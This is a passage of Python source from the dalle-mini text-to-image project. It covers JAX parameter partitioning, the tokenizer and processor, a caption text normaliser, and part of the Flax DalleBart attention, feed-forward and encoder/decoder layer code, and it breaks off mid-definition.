) File: src/dalle_mini/model/partitions.py import re from flax.core.frozen_dict import freeze from flax.traverse_util import flatten_dict, unflatten_dict from jax.experimental import PartitionSpec as P # utils adapted from https://github.com/google-research/google-research/blob/master/flax_models/t5x/partitions.py # Sentinels _unmatched = object() # For specifying empty leaf dict `{}` empty_dict = object() def _match(qs, ks): """Return True if regexes in qs match any window of strings in tuple ks.""" # compile regexes and force complete match qts = tuple(map(lambda x: re.compile(x + "$"), qs)) for i in range(len(ks) - len(qs) + 1): matches = [x.match(y) for x, y in zip(qts, ks[i:])] if matches and all(matches): return True return False def _replacement_rules(rules): def replace(key, val): for rule, replacement in rules: if _match(rule, key): return replacement return val return replace def _get_partition_rules(): return [ # embeddings (("embed_positions", "embedding"), P("mp", None)), (("embed_tokens", "embedding"), P("mp", None)), (("rel_bias", "embedding"), P(None, "mp")), # attention (("(q_proj|k_proj|v_proj)", "kernel"), P(None, "mp")), (("out_proj", "kernel"), P("mp", None)), # FFN (("Dense_0", "kernel"), P(None, "mp")), (("GLU.*", "Dense_1", "kernel"), P(None, "mp")), (("GLU.*", "Dense_2", "kernel"), P("mp", None)), (("FFN.*", "Dense_1", "kernel"), P("mp", None)), # layer norms (("(bias|scale)",), None), (("lm_head", "kernel"), P(None, "mp")), # head scale and tau (("(head_scale|tau)",), None), ] def set_partitions(in_dict, use_scan): rules = _get_partition_rules() replace = _replacement_rules(rules) initd = {k: _unmatched for k in flatten_dict(in_dict)} result = {k: replace(k, v) for k, v in initd.items()} for k, v in result.items(): if v == _unmatched: print(f"Unmatched -> {k}") l = list(result.keys()) if use_scan: # add None dimension to layers result = { k: (P(*(None,) + v) if v is not None else None) if any(x in k for x in ["FlaxBartEncoderLayers", "FlaxBartDecoderLayers"]) else v for k, v in result.items() } assert _unmatched not in result.values(), "Incomplete partition spec." 
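# (added) Example of how the rules resolve, assuming a flax parameter path
# such as ("model", "encoder", "layers", "self_attn", "q_proj", "kernel"):
# the window ("q_proj", "kernel") matches the attention rule and that leaf
# gets P(None, "mp"), while biases and layer-norm scales fall through to the
# ("(bias|scale)",) rule and are left unpartitioned (None).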
return freeze(unflatten_dict(result)) File: src/dalle_mini/model/__init__.py from .configuration import DalleBartConfig from .modeling import DalleBart from .partitions import set_partitions from .processor import DalleBartProcessor from .tokenizer import DalleBartTokenizer File: src/dalle_mini/model/processor.py """ DalleBart processor """ from typing import List import jax.numpy as jnp from .configuration import DalleBartConfig from .text import TextNormalizer from .tokenizer import DalleBartTokenizer from .utils import PretrainedFromWandbMixin class DalleBartProcessorBase: def __init__( self, tokenizer: DalleBartTokenizer, normalize_text: bool, max_text_length: int ): self.tokenizer = tokenizer self.normalize_text = normalize_text self.max_text_length = max_text_length if normalize_text: self.text_processor = TextNormalizer() # create unconditional tokens uncond = self.tokenizer( "", return_tensors="jax", padding="max_length", truncation=True, max_length=self.max_text_length, ).data self.input_ids_uncond = uncond["input_ids"] self.attention_mask_uncond = uncond["attention_mask"] def __call__(self, text: List[str] = None): # check that text is not a string assert not isinstance(text, str), "text must be a list of strings" if self.normalize_text: text = [self.text_processor(t) for t in text] res = self.tokenizer( text, return_tensors="jax", padding="max_length", truncation=True, max_length=self.max_text_length, ).data # tokens used only with super conditioning n = len(text) res["input_ids_uncond"] = jnp.repeat(self.input_ids_uncond, n, axis=0) res["attention_mask_uncond"] = jnp.repeat(self.attention_mask_uncond, n, axis=0) return res @classmethod def from_pretrained(cls, *args, **kwargs): tokenizer = DalleBartTokenizer.from_pretrained(*args, **kwargs) config = DalleBartConfig.from_pretrained(*args, **kwargs) return cls(tokenizer, config.normalize_text, config.max_text_length) class DalleBartProcessor(PretrainedFromWandbMixin, DalleBartProcessorBase): pass File: src/dalle_mini/model/tokenizer.py """ DalleBart tokenizer """ from transformers import BartTokenizerFast from .utils import PretrainedFromWandbMixin class DalleBartTokenizer(PretrainedFromWandbMixin, BartTokenizerFast): pass File: src/dalle_mini/model/utils.py import os import tempfile from pathlib import Path import wandb class PretrainedFromWandbMixin: @classmethod def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs): """ Initializes from a wandb artifact or delegates loading to the superclass. """ with tempfile.TemporaryDirectory() as tmp_dir: # avoid multiple artifact copies if ":" in pretrained_model_name_or_path and not os.path.isdir( pretrained_model_name_or_path ): # wandb artifact if wandb.run is not None: artifact = wandb.run.use_artifact(pretrained_model_name_or_path) else: artifact = wandb.Api().artifact(pretrained_model_name_or_path) pretrained_model_name_or_path = artifact.download(tmp_dir) return super(PretrainedFromWandbMixin, cls).from_pretrained( pretrained_model_name_or_path, *model_args, **kwargs ) File: src/dalle_mini/model/text.py """ Utilities for processing text. 
""" import html import math import random import re from pathlib import Path import emoji import ftfy from huggingface_hub import hf_hub_download from unidecode import unidecode # based on wiki word occurrence person_token = [("a person", 282265), ("someone", 121194), ("somebody", 12219)] temp_token = "xtokx" # avoid repeating chars class HashtagProcessor: # Adapted from wordninja library # We use our wikipedia word count + a good heuristic to make it work def __init__(self): wiki_word_frequency = hf_hub_download( "dalle-mini/dalle-mini", filename="enwiki-words-frequency.txt" ) self._word_cost = ( l.split()[0] for l in Path(wiki_word_frequency).read_text(encoding="utf8").splitlines() ) self._word_cost = { str(k): math.log(float(i + 1)) for i, k in enumerate(self._word_cost) } self._max_word = max(len(x) for x in self._word_cost.keys()) self._SPLIT_RE = re.compile("[^a-zA-Z0-9']+") def __call__(self, s): """Uses dynamic programming to infer the location of spaces in a string without spaces.""" l = [self._split(x) for x in self._SPLIT_RE.split(s)] return " ".join([item for sublist in l for item in sublist]) def _split(self, s): # Find the best match for the i first characters, assuming cost has # been built for the i-1 first characters. # Returns a pair (match_cost, match_length). def best_match(i): candidates = enumerate(reversed(cost[max(0, i - self._max_word) : i])) return min( (c + self._word_cost.get(s[i - k - 1 : i].lower(), 9e999), k + 1) for k, c in candidates ) # Build the cost array cost = [0] for i in range(1, len(s) + 1): c, k = best_match(i) cost.append(c) # Backtrack to recover the minimal-cost string. out = [] i = len(s) while i > 0: c, k = best_match(i) assert c == cost[i] newToken = True if not s[i - k : i] == "'": # ignore a lone apostrophe if len(out) > 0: # re-attach split 's and split digits if out[-1] == "'s" or ( s[i - 1].isdigit() and out[-1][0].isdigit() ): # digit followed by digit out[-1] = ( s[i - k : i] + out[-1] ) # combine current token with previous token newToken = False if newToken: out.append(s[i - k : i]) i -= k return reversed(out) def replace_person_token(t): "Used for CC12M" t = re.sub("<person>([,\s]*(and)*[,\s]*<person>)+", " people ", t) while "<person>" in t: t = t.replace( "<person>", f" {random.choices(*tuple(zip(*person_token)))[0]} ", 1 ) return t def fix_html(t): # from OpenAI CLIP return html.unescape(html.unescape(t)) def replace_punctuation_with_commas(t): return re.sub("[()[\].,|:;?!=+~\-\/{}]", ",", t) def simplify_quotes(t): return re.sub("""['"`]""", ' " ', t) def merge_quotes(t): return re.sub('(\s*"+\s*)+', ' " ', t) def remove_comma_numbers(t): def _f(t): return re.sub("(\d),(\d{3})", r"\1\2", t) return _f(_f(t)) def pre_process_dot_numbers(t): return re.sub("(\w)\.(\w)", rf"\1{temp_token}dot{temp_token}\2", t) def post_process_dot_numbers(t): return re.sub(f"{temp_token}dot{temp_token}", ".", t) def pre_process_quotes(t): # allows quotes only for 's, 't, 'd, 'm, 'll, 're, 've return re.sub( r"'(?=([stdm]|(ll)|(re)|(ve)|(ll))\b)", rf"{temp_token}quote{temp_token}", t ) def post_process_quotes(t): return re.sub(f"{temp_token}quote{temp_token}", "'", t) def pre_process_dates(t): return re.sub("(\d)/(\d)", rf"\1{temp_token}slash{temp_token}\2", t) def post_process_dates(t): return re.sub(f"{temp_token}slash{temp_token}", "/", t) def merge_commas(t): return re.sub("(\s*,+\s*)+", ", ", t) def add_space_after_commas(t): return re.sub(",", ", ", t) def handle_special_chars(t): "Handle special characters" # replace "-" with a space when 
between words without space t = re.sub("(\w)-(\w)", r"\1 \2", t) # always add space around some characters return re.sub("([%&\/$*])", r" \1 ", t) def expand_hashtags(t, hashtag_processor): "Remove # and try to split words" return re.sub("#(\w+)", lambda m: hashtag_processor(m.group(1)), t) _re_ignore_chars = r"[_#\\]" def ignore_chars(t): "Ignore useless characters" return re.sub(_re_ignore_chars, " ", t) def remove_extra_spaces(t): "Remove extra spaces (including \t and \n)" return re.sub("\s+", " ", t) def remove_repeating_chars(t): "If the same character is present 4+ times (not 3 because of roman 'VIII'), replace with single instance" return re.sub(r"(\D)(\1{3,})", r"\1", t) def remove_urls(t): return re.sub(r"http\S+", "", t) def remove_html_tags(t): return re.sub("<[^<]+?>", " ", t) def remove_first_last_commas(t): t = t.strip() t = t[:-1] if t and t[-1] == "," else t t = t[1:] if t and t[0] == "," else t return t.strip() def remove_wiki_ref(t): t = re.sub(r"\A\s*\[\d+\]", "", t) return re.sub(r"\[\d+\]\s*\Z", "", t) class TextNormalizer: "Normalize text" def __init__(self): self._hashtag_processor = HashtagProcessor() def __call__(self, t): # fix some characters t = ftfy.fix_text(t) # fix html t = fix_html(t) # decode emojis (would be removed by unidecode) t = emoji.demojize(t) # decode and simplify text: see unidecode library t = unidecode(t) # lower case t = t.lower() # replace <PERSON> (for CC12M) t = replace_person_token(t) # remove wiki reference (for WIT) t = remove_wiki_ref(t) # remove html tags t = remove_html_tags(t) # remove urls t = remove_urls(t) # remove commas in numbers t = remove_comma_numbers(t) # handle dots in numbers and quotes - Part 1 t = pre_process_dot_numbers(t) t = pre_process_quotes(t) t = pre_process_dates(t) # handle special characters t = handle_special_chars(t) # handle hashtags t = expand_hashtags(t, self._hashtag_processor) # ignore useless characters t = ignore_chars(t) # simplify quotes t = simplify_quotes(t) # all punctuation becomes commas t = replace_punctuation_with_commas(t) # handle dots in numbers and quotes - Part 2 t = post_process_dot_numbers(t) t = post_process_quotes(t) t = post_process_dates(t) # handle repeating characters t = remove_repeating_chars(t) # merge quotes t = merge_quotes(t) # merge commas t = merge_commas(t) # remove multiple spaces t = remove_extra_spaces(t) # remove first and last comma t = remove_first_last_commas(t) # always start with a space return f" {t}" File: src/dalle_mini/model/modeling.py # coding=utf-8 # Copyright 2021-2022 The Fairseq Authors and The Google Flax Team Authors And The HuggingFace Inc. team and & DALL·E Mini team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ DalleBart model. 
""" import math from functools import partial from typing import Any, Dict, Optional, Tuple import flax import flax.linen as nn import jax import jax.numpy as jnp from einops import rearrange from flax.core.frozen_dict import unfreeze from flax.linen import combine_masks, make_causal_mask from flax.linen import partitioning as nn_partitioning from flax.linen.linear import PrecisionLike from flax.traverse_util import flatten_dict, unflatten_dict from jax import custom_jvp, lax from jax.random import PRNGKey from transformers.modeling_flax_outputs import ( FlaxBaseModelOutput, FlaxBaseModelOutputWithPastAndCrossAttentions, FlaxCausalLMOutputWithCrossAttentions, FlaxSeq2SeqLMOutput, ) from transformers.modeling_flax_utils import ACT2FN from transformers.models.bart.modeling_flax_bart import ( FlaxBartAttention, FlaxBartForConditionalGeneration, FlaxBartForConditionalGenerationModule, FlaxBartModule, ) from transformers.utils import ModelOutput, logging from .configuration import DalleBartConfig from .utils import PretrainedFromWandbMixin logger = logging.get_logger(__name__) remat = nn_partitioning.remat def smelu(beta: Any = 1.0): """ Implementation of "Real World Large Scale Recommendation Systems Reproducibility and Smooth Activations" https://arxiv.org/abs/2202.06499 """ @custom_jvp @jax.jit def _smelu(x: Any) -> Any: x = jnp.where(x <= -beta, 0.0, x) return jnp.where(x >= beta, x, jnp.square(x + beta) / (4 * beta)) _smelu.defjvps( lambda g, ans, x: lax.select( x == -beta, lax.full_like(g, 0), lax.select(x == beta, lax.full_like(g, 1), g), ) ) return _smelu ACT2FN.update({"smelu": smelu()}) # deepnet initialization def deepnet_init(init_std, gain=1): init = jax.nn.initializers.normal(init_std) def _init(*args, **kwargs): return gain * init(*args, **kwargs) return _init # deepnet gain deepnet_gain = { "encoder": { "alpha": lambda config: 0.81 * (config.encoder_layers**4 * config.decoder_layers) ** 0.0625, "beta": lambda config: 0.87 * (config.encoder_layers**4 * config.decoder_layers) ** -0.0625, }, "decoder": { "alpha": lambda config: (3 * config.decoder_layers) ** 0.25, "beta": lambda config: (12 * config.decoder_layers) ** -0.25, }, } # subln gain subln_gain = { "encoder": lambda config: math.sqrt( 1.0 / 3.0 * math.log(3 * config.decoder_layers) * math.log(2 * config.encoder_layers) ), "decoder": lambda config: math.sqrt(math.log(3 * config.decoder_layers)), } class RMSNorm(nn.Module): """ From "Root Mean Square Layer Normalization" by https://arxiv.org/abs/1910.07467 Adapted from flax.linen.LayerNorm """ epsilon: float = 1e-6 dtype: Any = jnp.float32 param_dtype: Any = jnp.float32 use_scale: bool = True scale_init: Any = jax.nn.initializers.ones @nn.compact def __call__(self, x): reduction_axes = (-1,) feature_axes = (-1,) rms_sq = self._compute_rms_sq(x, reduction_axes) return self._normalize( self, x, rms_sq, reduction_axes, feature_axes, self.dtype, self.param_dtype, self.epsilon, self.use_scale, self.scale_init, ) def _compute_rms_sq(self, x, axes): x = jnp.asarray(x, jnp.promote_types(jnp.float32, jnp.result_type(x))) rms_sq = jnp.mean(jax.lax.square(x), axes) return rms_sq def _normalize( self, mdl, x, rms_sq, reduction_axes, feature_axes, dtype, param_dtype, epsilon, use_scale, scale_init, ): reduction_axes = nn.normalization._canonicalize_axes(x.ndim, reduction_axes) feature_axes = nn.normalization._canonicalize_axes(x.ndim, feature_axes) stats_shape = list(x.shape) for axis in reduction_axes: stats_shape[axis] = 1 rms_sq = rms_sq.reshape(stats_shape) feature_shape = [1] * 
x.ndim reduced_feature_shape = [] for ax in feature_axes: feature_shape[ax] = x.shape[ax] reduced_feature_shape.append(x.shape[ax]) mul = lax.rsqrt(rms_sq + epsilon) if use_scale: scale = mdl.param( "scale", scale_init, reduced_feature_shape, param_dtype ).reshape(feature_shape) mul *= scale y = mul * x return jnp.asarray(y, dtype) def norm(type, *args, **kwargs): if type == "rmsnorm": return RMSNorm(*args, **kwargs) elif type == "layernorm": return nn.LayerNorm(*args, **kwargs) else: raise ValueError(f"Unknown norm type {type}") def dot_product_attention_weights( query: Any, key: Any, bias: Optional[Any] = None, mask: Optional[Any] = None, embed_pos: Optional[Any] = None, broadcast_dropout: bool = True, dropout_rng: Optional[PRNGKey] = None, dropout_rate: float = 0.0, deterministic: bool = False, dtype: Any = jnp.float32, precision: PrecisionLike = None, sinkhorn_iters: int = 1, is_encoder: bool = False, tau=None, ): """ Computes dot-product attention weights given query and key. mask is included into the bias. Adapted from flax.linen.attention.dot_product_attention_weights" """ assert query.ndim == key.ndim, "q, k must have same rank." assert query.shape[:-3] == key.shape[:-3], "q, k batch dims must match." assert query.shape[-2] == key.shape[-2], "q, k num_heads must match." assert query.shape[-1] == key.shape[-1], "q, k depths must match." # attn weight shape is (batch..., num_heads, q_length, kv_length) attn_weights = jnp.einsum("...qhd,...khd->...hqk", query, key, precision=precision) # divide by tau (used in Swin v2) if tau is not None: attn_weights = attn_weights / tau else: depth = query.shape[-1] attn_weights = attn_weights / jnp.sqrt(depth).astype(dtype) # apply attention bias: masking, dropout, proximity bias, etc. if bias is not None: attn_weights = attn_weights + bias # add relative position if embed_pos is not None: attn_weights = attn_weights + embed_pos # normalize the attention weights if not is_encoder or sinkhorn_iters == 1: # sinkhorn does not work for causal (leaks info of future tokens into past) attn_weights = jax.nn.softmax(attn_weights).astype(dtype) else: # adapted from https://github.com/lucidrains/sinkhorn-transformer for i in range(sinkhorn_iters): # when causal, some attn_weights have been set to -inf through bias if i % 2 == 0: attn_weights -= jax.nn.logsumexp(attn_weights, axis=-1, keepdims=True) else: attn_weights -= jax.nn.logsumexp(attn_weights, axis=-2, keepdims=True) if mask is not None: attn_weights = jnp.where(mask, attn_weights, -jnp.inf) attn_weights = jnp.exp(attn_weights).astype(dtype) # apply attention dropout if not deterministic and dropout_rate > 0.0: keep_prob = 1.0 - dropout_rate if broadcast_dropout: # dropout is broadcast across the batch + head dimensions dropout_shape = tuple([1] * (key.ndim - 2)) + attn_weights.shape[-2:] keep = jax.random.bernoulli(dropout_rng, keep_prob, dropout_shape) else: keep = jax.random.bernoulli(dropout_rng, keep_prob, attn_weights.shape) multiplier = keep.astype(attn_weights.dtype) / jnp.asarray( keep_prob, dtype=dtype ) attn_weights = attn_weights * multiplier return attn_weights class FlaxBartAttention(FlaxBartAttention): """ Edits: - causal mask is used only in decoder and considers image_length - scale attention heads per NormFormer paper """ is_encoder: bool = False is_cross_attention: bool = False q_length: int = None k_length: int = None def setup(self) -> None: self.head_dim = self.embed_dim // self.num_heads if self.head_dim * self.num_heads != self.embed_dim: raise ValueError( f"embed_dim must be 
divisible by num_heads (got `embed_dim`: {self.embed_dim}" f" and `num_heads`: {self.num_heads})." ) dense = partial( nn.Dense, self.embed_dim, use_bias=self.bias, dtype=self.dtype, ) if self.config.use_deepnet_scaling: gain = deepnet_gain["encoder" if self.is_encoder else "decoder"]["beta"]( self.config ) elif self.config.use_subln_init and not self.is_cross_attention: gain = subln_gain["encoder" if self.is_encoder else "decoder"](self.config) self.q_proj = dense( kernel_init=jax.nn.initializers.normal(self.config.init_std) ) self.k_proj = dense( kernel_init=jax.nn.initializers.normal(self.config.init_std) ) self.v_proj = dense( kernel_init=deepnet_init(self.config.init_std, gain) if ( self.config.use_deepnet_scaling or (self.config.use_subln_init and not self.is_cross_attention) ) else jax.nn.initializers.normal(self.config.init_std) ) self.out_proj = dense( kernel_init=deepnet_init(self.config.init_std, gain) if ( self.config.use_deepnet_scaling or (self.config.use_subln_init and not self.is_cross_attention) ) else jax.nn.initializers.normal(self.config.init_std) ) self.dropout_layer = nn.Dropout(rate=self.dropout) if self.config.use_head_scale: self.head_scale = self.param( "head_scale", jax.nn.initializers.ones, (1, 1, self.num_heads, 1) ) if self.config.use_cosine_attention: # TODO: try using a learnt scale, somehow it immediately diverges in my experiments self.tau = self.config.tau_init if self.config.use_swin_position_embeddings: self.rel_bias = nn.Embed( self.q_length, self.k_length * self.num_heads, embedding_init=jax.nn.initializers.normal(self.config.init_std), ) if self.causal: # used only in decoder self.causal_mask = make_causal_mask( jnp.ones((1, self.config.image_length), dtype="bool"), dtype="bool" ) if self.config.ln_positions in ["subln"] and not self.is_cross_attention: self.mid_layernorm = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05 ) def __call__( self, hidden_states: jnp.ndarray, key_value_states: Optional[jnp.ndarray] = None, attention_mask: Optional[jnp.ndarray] = None, init_cache: bool = False, deterministic: bool = True, ) -> Tuple[jnp.ndarray]: """Input shape: Batch x Time x Channel""" # if key_value_states are provided this layer is used as a cross-attention layer # for the decoder is_cross_attention = key_value_states is not None batch_size = hidden_states.shape[0] # get query proj query_states = self.q_proj(hidden_states) # get key, value proj if is_cross_attention: # cross_attentions key_states = self.k_proj(key_value_states) value_states = self.v_proj(key_value_states) else: # self_attention key_states = self.k_proj(hidden_states) value_states = self.v_proj(hidden_states) query_states = self._split_heads(query_states) key_states = self._split_heads(key_states) value_states = self._split_heads(value_states) # handle cache prepare causal attention mask if self.causal: query_length, key_length = query_states.shape[1], key_states.shape[1] if self.has_variable("cache", "cached_key"): mask_shift = self.variables["cache"]["cache_index"] max_decoder_length = self.variables["cache"]["cached_key"].shape[1] causal_mask = lax.dynamic_slice( self.causal_mask, (0, 0, mask_shift, 0), (1, 1, query_length, max_decoder_length), ) else: causal_mask = self.causal_mask[:, :, :query_length, :key_length] causal_mask = jnp.broadcast_to( causal_mask, (batch_size,) + causal_mask.shape[1:] ) # combine masks if needed if attention_mask is not None and self.causal: attention_mask = jnp.broadcast_to( jnp.expand_dims(attention_mask, axis=(-3, -2)), causal_mask.shape ) 
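            # combine_masks takes the logical AND of the padding mask and the
            # causal mask, so a key position must be both non-padded and not in
            # the future for the query to attend to it.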
attention_mask = combine_masks(attention_mask, causal_mask) elif self.causal: attention_mask = causal_mask elif attention_mask is not None: attention_mask = jnp.expand_dims(attention_mask, axis=(-3, -2)) # During fast autoregressive decoding, we feed one position at a time, # and cache the keys and values step by step. if self.causal and (self.has_variable("cache", "cached_key") or init_cache): key_states, value_states, attention_mask = self._concatenate_to_cache( key_states, value_states, query_states, attention_mask ) # Convert the boolean attention mask to an attention bias. if attention_mask is not None: # attention mask in the form of attention bias attention_bias = lax.select( attention_mask > 0, jnp.full(attention_mask.shape, 0.0).astype(self.dtype), jnp.full(attention_mask.shape, -jnp.inf).astype(self.dtype), ) else: attention_bias = None dropout_rng = None if not deterministic and self.dropout > 0.0: dropout_rng = self.make_rng("dropout") if self.config.use_cosine_attention: # normalize q and k query_states = query_states / ( jnp.linalg.norm(query_states, axis=-1, keepdims=True) + 1e-8 ) key_states = key_states / ( jnp.linalg.norm(key_states, axis=-1, keepdims=True) + 1e-8 ) # relative position embeddings if self.config.use_swin_position_embeddings: position_ids = jnp.arange(self.q_length) embed_pos = self.rel_bias(position_ids) embed_pos = rearrange(embed_pos, "q (k h) -> 1 h q k", h=self.num_heads) else: embed_pos = None tau = self.tau if self.config.use_cosine_attention else None attn_weights = dot_product_attention_weights( query_states, key_states, bias=attention_bias, mask=attention_mask, embed_pos=embed_pos, dropout_rng=dropout_rng, dropout_rate=self.dropout, broadcast_dropout=True, deterministic=deterministic, dtype=self.dtype, precision=None, sinkhorn_iters=self.config.sinkhorn_iters, is_encoder=self.is_encoder, tau=tau, ) attn_output = jnp.einsum("...hqk,...khd->...qhd", attn_weights, value_states) if self.config.use_head_scale: # per Normformer attn_output = attn_output * self.head_scale attn_output = self._merge_heads(attn_output) if self.config.ln_positions in ["subln"] and not self.is_cross_attention: attn_output = self.mid_layernorm(attn_output) attn_output = self.out_proj(attn_output) return attn_output, attn_weights class GLU(nn.Module): """From "GLU Variants Improve Transformer" by https://arxiv.org/abs/2002.05202""" config: DalleBartConfig ffn_dim: int embed_dim: int dtype: jnp.dtype = jnp.float32 is_encoder: bool = False @nn.compact def __call__(self, x: jnp.ndarray, deterministic: bool = True) -> jnp.ndarray: if self.config.use_deepnet_scaling: gain = deepnet_gain["encoder" if self.is_encoder else "decoder"]["beta"]( self.config ) elif self.config.use_subln_init: gain = subln_gain["encoder" if self.is_encoder else "decoder"](self.config) if self.config.ln_positions in ["normformer", "cogview", "preln", "subln"]: x = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(x) w = nn.Dense( self.ffn_dim, dtype=self.dtype, use_bias=self.config.use_bias, kernel_init=deepnet_init(self.config.init_std, gain) if (self.config.use_deepnet_scaling or self.config.use_subln_init) else jax.nn.initializers.normal(self.config.init_std), )(x) w = ACT2FN[self.config.activation_function](w) v = nn.Dense( self.ffn_dim, dtype=self.dtype, use_bias=self.config.use_bias, kernel_init=deepnet_init(self.config.init_std, gain) if (self.config.use_deepnet_scaling or self.config.use_subln_init) else 
jax.nn.initializers.normal(self.config.init_std), )(x) x = w * v if self.config.ln_positions in ["normformer", "subln"]: x = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(x) x = nn.Dropout(rate=self.config.activation_dropout)( x, deterministic=deterministic ) x = nn.Dense( self.embed_dim, dtype=self.dtype, use_bias=self.config.use_bias, kernel_init=deepnet_init(self.config.init_std, gain) if (self.config.use_deepnet_scaling or self.config.use_subln_init) else jax.nn.initializers.normal(self.config.init_std), )(x) if self.config.ln_positions in ["swinv2", "cogview"]: x = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)(x) x = nn.Dropout(rate=self.config.dropout)(x, deterministic=deterministic) return x class FFN(nn.Module): """Simple FFN layer""" config: DalleBartConfig ffn_dim: int embed_dim: int dtype: jnp.dtype = jnp.float32 is_encoder: bool = False @nn.compact def __call__(self, x: jnp.ndarray, deterministic: bool = True) -> jnp.ndarray: if self.config.use_deepnet_scaling: gain = deepnet_gain["encoder" if self.is_encoder else "decoder"]["beta"]( self.config ) elif self.config.use_subln_init: gain = subln_gain["encoder" if self.is_encoder else "decoder"](self.config) if self.config.ln_positions in ["normformer", "cogview", "preln", "subln"]: x = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(x) x = nn.Dense( self.ffn_dim, dtype=self.dtype, use_bias=self.config.use_bias, kernel_init=deepnet_init(self.config.init_std, gain) if (self.config.use_deepnet_scaling or self.config.use_subln_init) else jax.nn.initializers.normal(self.config.init_std), )(x) x = ACT2FN[self.config.activation_function](x) if self.config.ln_positions in ["normformer", "subln"]: x = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(x) x = nn.Dropout(rate=self.config.activation_dropout)( x, deterministic=deterministic ) x = nn.Dense( self.embed_dim, dtype=self.dtype, use_bias=self.config.use_bias, kernel_init=deepnet_init(self.config.init_std, gain) if (self.config.use_deepnet_scaling or self.config.use_subln_init) else jax.nn.initializers.normal(self.config.init_std), )(x) if self.config.ln_positions in ["swinv2", "cogview"]: x = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)(x) x = nn.Dropout(rate=self.config.dropout)(x, deterministic=deterministic) return x class FlaxBartEncoderLayer(nn.Module): """ Edits: - no bias - use custom FlaxBartAttention """ config: DalleBartConfig dtype: jnp.dtype = jnp.float32 add_norm: bool = False use_scale: bool = True @nn.compact def __call__( self, hidden_states: jnp.ndarray, attention_mask: jnp.ndarray, output_attentions: bool = True, deterministic: bool = True, ) -> Tuple[jnp.ndarray]: if self.config.use_scan: hidden_states = hidden_states[0] res_gain = ( deepnet_gain["encoder"]["alpha"](self.config) if self.config.use_deepnet_scaling else 1 ) embed_dim = self.config.d_model residual = hidden_states if self.config.ln_positions in ["normformer", "cogview", "preln", "subln"]: hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(hidden_states) hidden_states, attn_weights = FlaxBartAttention( config=self.config, embed_dim=embed_dim, num_heads=self.config.encoder_attention_heads, dropout=self.config.attention_dropout, bias=self.config.use_bias, dtype=self.dtype, is_encoder=True, is_cross_attention=False, q_length=self.config.max_text_length, 
k_length=self.config.max_text_length, )(hidden_states=hidden_states, attention_mask=attention_mask) if self.config.ln_positions in ["normformer", "swinv2", "cogview"]: hidden_states = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)( hidden_states ) hidden_states = nn.Dropout(rate=self.config.dropout)( hidden_states, deterministic=deterministic ) hidden_states = residual * res_gain + hidden_states if self.config.ln_positions in ["postln"]: hidden_states = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)( hidden_states ) residual = hidden_states ff_block = ( GLU( config=self.config, ffn_dim=self.config.encoder_ffn_dim, embed_dim=embed_dim, dtype=self.dtype, is_encoder=True, ) if self.config.use_glu else FFN( config=self.config, ffn_dim=self.config.encoder_ffn_dim, embed_dim=embed_dim, dtype=self.dtype, is_encoder=True, ) ) hidden_states = ff_block(hidden_states, deterministic=deterministic) hidden_states = residual * res_gain + hidden_states if self.add_norm: use_scale = self.use_scale or self.config.force_ln_scale hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=use_scale, )(hidden_states) outputs = (hidden_states,) if output_attentions: outputs += (attn_weights,) if self.config.use_scan: outputs = (outputs, None) return outputs class FlaxBartDecoderLayer(nn.Module): """ Edits: - no bias - use custom FlaxBartAttention """ config: DalleBartConfig dtype: jnp.dtype = jnp.float32 add_norm: bool = False use_scale: bool = True @nn.compact def __call__( self, hidden_states: jnp.ndarray, attention_mask: jnp.ndarray, encoder_hidden_states: Optional[jnp.ndarray] = None, encoder_attention_mask: Optional[jnp.ndarray] = None, init_cache: bool = False, output_attentions: bool = True, deterministic: bool = True, ) -> Tuple[jnp.ndarray]: if self.config.use_scan: hidden_states = hidden_states[0] res_gain = ( deepnet_gain["decoder"]["alpha"](self.config) if self.config.use_deepnet_scaling else 1 ) embed_dim = self.config.d_model residual = hidden_states # Self Attention if self.config.ln_positions in ["normformer", "cogview", "preln"]: hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(hidden_states) hidden_states, attn_weights = FlaxBartAttention( config=self.config, embed_dim=embed_dim, num_heads=self.config.decoder_attention_heads, dropout=self.config.attention_dropout, causal=True, bias=self.config.use_bias, dtype=self.dtype, is_encoder=False, is_cross_attention=False, q_length=self.config.image_length, k_length=self.config.image_length, )( hidden_states=hidden_states, attention_mask=attention_mask, init_cache=init_cache, ) if self.config.ln_positions in ["normformer", "swinv2", "cogview"]: hidden_states = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)( hidden_states ) hidden_states = nn.Dropout(rate=self.config.dropout)( hidden_states, deterministic=deterministic ) hidden_states = residual * res_gain + hidden_states if self.config.ln_positions in ["postln"]: hidden_states = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)( hidden_states ) # Cross Attention cross_attn_weights = None if encoder_hidden_states is not None: residual = hidden_states if self.config.ln_positions in ["normformer", "cogview", "preln"]: hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(hidden_states) hidden_states, cross_attn_weights = FlaxBartAttention( config=self.config, embed_dim=embed_dim, 
